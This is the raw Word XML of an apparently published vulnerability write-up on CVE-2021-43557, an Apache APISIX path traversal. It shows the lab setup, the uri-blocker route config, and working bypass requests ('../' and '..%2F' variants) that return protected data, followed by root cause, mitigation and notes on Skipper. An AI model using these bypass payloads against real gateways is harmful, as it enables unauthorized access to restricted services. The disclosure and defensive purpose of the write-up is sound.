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4AD4" w14:textId="77777777" w:rsidR="00250022" w:rsidRPr="00250022" w:rsidRDefault="00250022" w:rsidP="00250022">
      <w:pPr>
        <w:spacing w:before="480" w:after="240"/>
        <w:outlineLvl w:val="0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48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00250022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48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>CVE-2021-43557: Apache APISIX: Path traversal in request_uri variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F336EA" w14:textId="61E775D7" w:rsidR="00250022" w:rsidRPr="00F4244D" w:rsidRDefault="00250022">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BFB32F6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In this article I will present my research on insecure usage of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$request_uri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variable in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5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Apache APISIX</w:t>
        </w:r>
      </w:hyperlink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ingress controller. My work end up in submit of security vulnerability, which was positively confirmed and got CVE-2021-43557. At the end of article I will mention in short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6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Skipper</w:t>
        </w:r>
      </w:hyperlink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which I tested for same problem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDF0206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What is APISIX ? From official website:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5D875A" w14:textId="77777777" w:rsidR="00250022" w:rsidRPr="00F4244D" w:rsidRDefault="00250022" w:rsidP="00250022">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Fira Sans" w:hAnsi="Fira Sans" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Sans" w:hAnsi="Fira Sans" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Apache APISIX is a dynamic, real-time, high-performance API gateway. APISIX provides rich traffic management features such as load balancing, dynamic upstream, canary release, circuit breaking, authentication, observability, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1E8C8B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Why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$request_uri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? This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7" w:anchor="var_request_uri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variable</w:t>
        </w:r>
      </w:hyperlink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is many times used in authentication and authorization plugins. It’s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Strong"/>
          <w:rFonts w:ascii="Fira Sans" w:hAnsi="Fira Sans"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>not normalized</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Sans" w:hAnsi="Fira Sans"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>, so giving a possibility to bypass some restrictions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E028C48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In Apache APISIX there is no typical functionality of external authentication/authorization. You can write your own plugin, but it’s quite complicated. To prove that APISIX is vulnerable to path-traversal I will use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uri-blocker</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Sans" w:hAnsi="Fira Sans"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>plugin. I’m suspecting that other plugins are also vulnerable but this one is easy to use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CC938D" w14:textId="77777777" w:rsidR="00250022" w:rsidRPr="00F4244D" w:rsidRDefault="00250022" w:rsidP="00250022">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Setting the stage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D45698F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Install APISIX into Kubernetes. Use helm chart with version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Strong"/>
          <w:rFonts w:ascii="Fira Sans" w:hAnsi="Fira Sans"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>0.7.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Sans" w:hAnsi="Fira Sans"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEF448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helm repo add apisix https://charts.apiseven.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0825B88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helm repo add bitnami https://charts.bitnami.com/bitnami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A23FA31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helm repo update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4141EEA9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kubectl create ns ingress-apisix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196DA077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helm install apisix apisix/apisix \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB1AB4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--set gateway.type=NodePort \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4403B507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--set ingress-controller.enabled=true \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D44B445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--namespace ingress-apisix \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC49608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--version 0.7.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BC7804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kubectl get service --namespace ingress-apisix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1054F365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In case of problems follow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8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official guide</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Sans" w:hAnsi="Fira Sans"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260A172D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lastRenderedPageBreak/>
        <w:t>To create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Emphasis"/>
          <w:rFonts w:ascii="Fira Sans" w:hAnsi="Fira Sans"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>ingress route</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Sans" w:hAnsi="Fira Sans"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>, you need to deploy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ApisixRoute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resource:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C27D6A3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apiVersion: apisix.apache.org/v2beta1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F621B6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kind: ApisixRoute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C1554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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F1FE27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name: public-service-route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB00B3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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AA2C4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http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25721CC1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- name: public-service-rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C5D3F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match:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3162230B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hosts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE73530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app.test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF0444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paths:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58777F4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/public-service/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5B9964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backends:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04188B2A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- serviceName: public-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9F8B39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servicePort: 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FACCFB0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plugins:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A885CE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name: proxy-rewrite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6321F4C5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enable: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B8079A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config:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37087736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regex_uri: ["/public-service/(.*)", "/$1"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD22B68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- name: protected-service-rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD817F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match:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1D0B45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hosts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41461F0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app.test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A21E60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paths:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418360A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/protected-service/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681EED8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backends:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058A7915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- serviceName: protected-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C53E0D7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servicePort: 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E55327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plugins:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B3B7BE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name: uri-blocker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099CACD3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enable: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9EC1F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config:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1784FA1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block_rules: ["^/protected-service(/?).*"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637BFB9B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case_insensitive: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267057AE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- name: proxy-rewrite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE0770B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enable: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4443A9C0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config:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D412E6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regex_uri: ["/protected-service/(.*)", "/$1"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE5EDD3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Let’s dive deep into it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE1A3A0" w14:textId="77777777" w:rsidR="00250022" w:rsidRPr="00F4244D" w:rsidRDefault="00250022" w:rsidP="00250022">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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  <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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it creates routes for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public-service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and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private-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4F0127" w14:textId="77777777" w:rsidR="00250022" w:rsidRPr="00F4244D" w:rsidRDefault="00250022" w:rsidP="00250022">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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  <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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there is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proxy-rewrite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turned on to remove prefixes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EBE859" w14:textId="77777777" w:rsidR="00250022" w:rsidRPr="00F4244D" w:rsidRDefault="00250022" w:rsidP="00250022">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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  <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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there is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uri-blocker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plugin configured for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protected-service</w:t>
      </w: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. It can look like mistake but this plugin it about to block any requests starting with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/protected-service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Fonts w:ascii="Apple Color Emoji" w:hAnsi="Apple Color Emoji" w:cs="Apple Color Emoji"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>😀</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3D5421" w14:textId="77777777" w:rsidR="00250022" w:rsidRPr="00F4244D" w:rsidRDefault="00250022" w:rsidP="00250022">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D15FDD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I’m using APISIX in version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Strong"/>
          <w:rFonts w:ascii="Fira Sans" w:hAnsi="Fira Sans"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>2.10.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Sans" w:hAnsi="Fira Sans"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76576E02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Reaching out to APISIX routes in minikube is quite inconvenient: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kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/public-service/public -H 'Host: app.test'</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Sans" w:hAnsi="Fira Sans"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>. To ease my pain I will write small script that will work as template:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132442EF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#/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71287634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</w:p>
    <w:p w14:paraId="384BAF9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kubectl exec -it -n ingress-apisix apisix-dc9d99d76-vl5lh -- curl --path-as-is http://127.0.0.1:9080$1 -H 'Host: app.test'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9CE44A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In your case replace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apisix-dc9d99d76-vl5lh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with name of actual APISIX pod.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEEC4F1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Let’s start with validation if routes and plugins are working as expected:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06065E7F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$ ./apisix_request.sh "/public-service/public"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D63D4E0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Defaulted container "apisix" out of: apisix, wait-etcd (init)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EA6BB1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{"data":"public data"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713248BA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$ ./apisix_request.sh "/protected-service/protected"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311D0933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Defaulted container "apisix" out of: apisix, wait-etcd (init)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F6A64B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&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E567100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&lt;head&gt;&lt;title&gt;403 Forbidden&lt;/title&gt;&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4539DA1A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&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5770EDC3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&lt;center&gt;&lt;h1&gt;403 Forbidden&lt;/h1&gt;&lt;/center&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225E3546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&lt;hr&gt;&lt;center&gt;openresty&lt;/center&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132E7355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&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780B407E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&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B61FF3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Yep.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public-service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is available and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protected-service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is blocked by plugin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF4A8FB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Now let’s test payloads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6803A11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$ ./apisix_request.sh "/public-service/../protected-service/protected"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E48C028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Defaulted container "apisix" out of: apisix, wait-etcd (init)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7800AA93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{"data":"protected data"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9CC6E8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and second one:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358795B6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$ ./apisix_request.sh "/public-service/..%2Fprotected-service/protected"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D874262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Defaulted container "apisix" out of: apisix, wait-etcd (init)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390A6638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{"data":"protected data"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F004A28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 xml:space="preserve">As you can see in both cases I was able to bypass uri restrictions </w:t>
      </w:r>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Apple Color Emoji" w:hAnsi="Apple Color Emoji" w:cs="Apple Color Emoji"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>😄</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2929DC3D" w14:textId="77777777" w:rsidR="00250022" w:rsidRPr="00F4244D" w:rsidRDefault="00250022" w:rsidP="00250022">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Root cause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F2E5BA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hd w:val="clear" w:color="auto" w:fill="ADD8E6"/>
        </w:rPr>
        <w:t>uri-blocker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plugin is using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ctx.var.request_uri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variable in logic of making blocking decision. You can check it in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9" w:anchor="L98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code</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Sans" w:hAnsi="Fira Sans"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1263FB0C" w14:textId="7A696D02" w:rsidR="00250022" w:rsidRPr="00F4244D" w:rsidRDefault="00250022" w:rsidP="00250022">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/_l/pnb2t_9s0f192bqlz1348vpr0000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/140750129-f32e9acc-2f4b-42d9-b565-d52d44fe0504.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AE7DC4D" wp14:editId="142F6CB1">
            <wp:extent cx="5943600" cy="24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44D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A2B31C" w14:textId="77777777" w:rsidR="00250022" w:rsidRPr="00F4244D" w:rsidRDefault="00250022" w:rsidP="00250022">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBDF20C" w14:textId="77777777" w:rsidR="00250022" w:rsidRPr="00F4244D" w:rsidRDefault="00250022" w:rsidP="00250022">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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  <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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attacker can bypass access control restrictions and perform successful access to routes that shouldn’t be able to,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFB64AA" w14:textId="77777777" w:rsidR="00250022" w:rsidRPr="00F4244D" w:rsidRDefault="00250022" w:rsidP="00250022">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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  <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pP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developers of custom plugins have no knowledge that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Style w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="ADD8E6"/>
        </w:rPr>
        <w:t>ngx.var.request_uri</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>variable is untrusted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7051B156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Search for usage of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var.request_uri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gave me a hint that maybe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11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authz-keycloak plugin</w:t>
        </w:r>
      </w:hyperlink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is affected. You can see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12" w:anchor="L578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this code</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Sans" w:hAnsi="Fira Sans"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>, it looks really nasty. If there is no normalization on keycloak side, then there is high potential for vulnerablity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090D1972" w14:textId="77777777" w:rsidR="00250022" w:rsidRPr="00F4244D" w:rsidRDefault="00250022" w:rsidP="00250022">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5695DECA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In case of custom plugins, I suggest to do path normalization before using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ngx.var.request_uri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variable. There are also two other variables, high probably normalized, to check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ctx.var.upstream_uri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and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ctx.var.uri</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Sans" w:hAnsi="Fira Sans"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E90C3F3" w14:textId="77777777" w:rsidR="00250022" w:rsidRPr="00F4244D" w:rsidRDefault="00250022" w:rsidP="00250022">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Skipper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BA0F94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Skipper is another ingress controller that I have investigated. It’s not easy to install it in kubernetes, because deployment guide and helm charts are outdated. Luckily I have found issue page where developer was describing how to install it. This ingress gives possibility to implement external authentication based on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13" w:anchor="webhook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webhook filter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Sans" w:hAnsi="Fira Sans"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F4737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apiVersion: networking.k8s.io/v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFF4A43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kind: Ingress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED0F3F6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>metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212BF584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name: my-ingress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7697EE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annotations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AF4A2C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zalando.org/skipper-filter: |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBD431D" w14:textId="77777777" w:rsidR="00250022" w:rsidRPr="00F4244D" w:rsidRDefault="00250022" w:rsidP="00250022">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="272822"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">            modPath("^/.*/", "/") -&gt; setRequestHeader("X-Auth-Request-Redirect", "${request.path}") -&gt; webhook("http://auth-service.default.svc.cluster.local:8080/verify")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C4942A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To add some interesting headers that could help in access control decision, you need to do it manually with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setRequestHeader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 xml:space="preserve">filter. There is template available to inject variable </w:t>
      </w:r>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Sans" w:hAnsi="Fira Sans"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>by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${}</w:t>
      </w:r>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Fira Sans" w:hAnsi="Fira Sans"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>. Sadly (for attackers)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${request.path}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 xml:space="preserve">is having normalized path </w:t>
      </w:r>
      <w:r w:rsidRPr="00F4244D">
        <w:rPr>
          <w:rFonts w:ascii="Apple Color Emoji" w:hAnsi="Apple Color Emoji" w:cs="Apple Color Emoji"/>
          <w:color w:val="000000" w:themeColor="text1"/>
